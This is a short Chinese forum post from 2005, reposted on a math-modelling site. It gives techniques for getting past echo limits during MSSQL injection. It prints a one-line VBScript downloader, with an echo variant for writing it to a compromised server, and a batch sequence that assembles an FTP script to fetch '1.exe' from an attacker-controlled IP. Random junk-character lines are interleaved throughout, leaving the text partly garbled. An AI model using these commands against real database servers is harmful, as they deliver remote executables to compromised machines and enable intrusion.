数学建模社区-数学中国
标题:
mssql注射时不可以多次echo的解决办法
[打印本页]
作者:
韩冰
时间:
2005-1-23 13:30
标题:
mssql注射时不可以多次echo的解决办法
<
>解决办法:
! _8 ?; P. I; ?8 @7 t
1.iget.vbs一次写入
, E ]$ U5 U& m0 m
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写
! N. M) V- n' h0 t! i1 ~
; O& h+ n5 b0 x9 `* y" m1 f+ m
Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
$ w9 t* S Y9 N
: ` Y* M, G7 B( Y% a4 N. T
这样我们可以一次echo成功,echo版本:
2 M7 W! K: i U" o3 j& Q
' P8 z. Z& o/ c6 B6 j7 Y+ R0 j
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs
; m+ f) F' ^4 d: w
* ?. ~( Y" _3 v. n4 g" |* l# p
. g l \+ T' w+ n( V0 y
2.bat调用ftp脚本的写法(by envymask)
D) L4 J5 M9 c! C* ^
$ Y2 t3 [) h" T. y+ m/ `
echo ftp>1.vbs
4 ?$ L# q& @1 n0 p, L0 Y& d
echo open ip>2.vbs
6 Z; b# p& J$ U: A" {: B) ]( N
echo u>3.vbs
5 N5 E2 j- f1 m# Y- x' m( J" o0 |9 \
echo s>4.vbs
; k6 @ x6 N, I. M0 o# ?5 |
echo binary>5.vbs
' ^8 B/ N; U/ u; K/ a8 ~
echo get 1.exe>6.vbs
! Q" q0 t, i( w& u' L6 q- z
echo bay>7.vbs
0 @ l% X3 v$ r
x) U' }% _+ {; B8 J
copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
% ~' \* f& ~6 c9 A# R" f
</P>
欢迎光临 数学建模社区-数学中国 (http://www.madio.net/)
Powered by Discuz! X2.5
>解决办法: ! _8 ?; P. I; ?8 @7 t